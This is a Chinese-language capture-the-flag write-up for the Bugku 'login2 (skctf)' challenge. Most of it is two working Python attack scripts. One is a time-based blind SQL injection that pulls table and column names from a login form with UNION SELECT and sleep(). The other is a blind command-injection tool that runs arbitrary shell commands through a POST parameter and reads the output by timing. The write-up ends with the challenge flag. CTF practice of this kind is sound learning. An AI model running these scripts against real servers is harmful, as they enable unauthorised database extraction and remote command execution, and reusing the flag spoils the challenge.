bugku login2(skctf) shell盲注

首先说下是看了这篇文章以后根据大佬的wp写的脚本。脚本也是别的地方抄的改的

https://www.cnblogs.com/blili/p/9045280.html

如何绕过上面这篇写的很详细了可以参考上面这篇绕开登录,笔者做了测试盲注了数据库skctf发现作者很gou项里面没有数据

下面附上盲注的脚本：

import requests
url = 'http://123.206.31.85:49165/login.php'
#allString = '''1234567890~`!@#$%^&*()-_=+[]{};:'"|\,<.>/?qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'''
allString = '''1234567890-_,qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'''
database = ''
flag = 1

#\'union select (if(length(database()!=0),sleep(10),1)),'202cb962ac59075b964b07152d234b70'   盲注数据库，此处替换函数可以注其他你想要的信息
#\'union select (select case when (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()) from %d for 1))=%d) then sleep(6) else 0 end),\'202cb962ac59075b964b07152d234b70\'#盲注表
#\'union select (select case when (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=\'admin\') from %d for 1))=%d) then sleep(6) else 0 end),\'202cb962ac59075b964b07152d234b70\'#盲注项
#\'union select (select case when (ascii(substr((select username from admin ) from %d for 1))=%d) then sleep(4) else 0 end),\'202cb962ac59075b964b07152d234b70\'#盲注内容但是里面啥都没有
for i in range(1,100):
    for j in allString:
        #header = {
            #"X-Forwarded-For":"1'+(select case when (ascii(substr(database() from %d for 1))=%d) then sleep(3) else 0 end))#"%(i,ord(j))
            #}
        data={
        'username':"dminhhjhj\'union select (select case when (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()) from %d for 1))=%d) then sleep(4) else 0 end),\'202cb962ac59075b964b07152d234b70\'#"%(i,ord(j)),#替换#以前的内容就可以
        'password':'123'
        }
        r = requests.post(url,data=data)
        t = r.elapsed.total_seconds()
        print(database+'     '+'the time of '+j+' is '+str(t))
        if t >= 4:
            database = database + j
            print('the '+str(i)+' place of database is '+j)
            break
        elif t < 4 and j == 'M':
            flag = 0
            break
    if flag == 0 :
        break
print('database:',database)

下面附上shell盲注脚本根据文章开头附上链接写的，主要笔者比较菜鸡。

import requests
url = 'http://123.206.31.85:49165/index.php'
s = requests.session()
allString = '''1234567890~`!@#$%^&*()-_=+[]{};:'"|\,<.>/?qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'''

database = ''
flag = 1
comm =input('输入指令：')
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0',
            'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
            'Referer':'http://123.206.31.85:49165/index.php',
}
cookies = dict(PHPSESSID='r8l8lt19lut1mq3gu7sogcq0q7')
for i in range(0,100):#根据自身需要改长度，如果空格连续出现四次以上，就说明后续没内容了
    for j in allString:
        #header = {
            #"X-Forwarded-For":"1'+(select case when (ascii(substr(database() from %d for 1))=%d) then sleep(3) else 0 end))#"%(i,ord(j))
            #}
        #print(j)
        if j == "^":
            #print('此处有空格')
            j = " "
            data={'c':"123;a=`"+comm+"`;b=' ';if [ ${a:"+str(i)+":1} == $b ];then sleep 4;fi"}
        else:
            data={'c':"123;a=`"+comm+"`;b=\'"+str(j)+"\';if [ ${a:"+str(i)+":1} == $b ];then sleep 4;fi"}
        r = requests.post(url,data=data,headers=headers,cookies=cookies)
        t = r.elapsed.total_seconds()
        #print(r.text)
        print(database+'     '+'the time of '+j+' is '+str(t))
        if t >= 4:
            database = database + j
            print('the '+str(i)+' place of database is '+j)
            break
        elif t < 4 and j == 'M':
            flag = 0
            break
    if flag == 0 :
        break
print('',database)

自己以后写盲注shell一定要注意引号特别是命令的引号

我们可以看到扫到这些内容访问txt就能拿到了

SKCTF{Uni0n_@nd_c0mM4nD_exEc}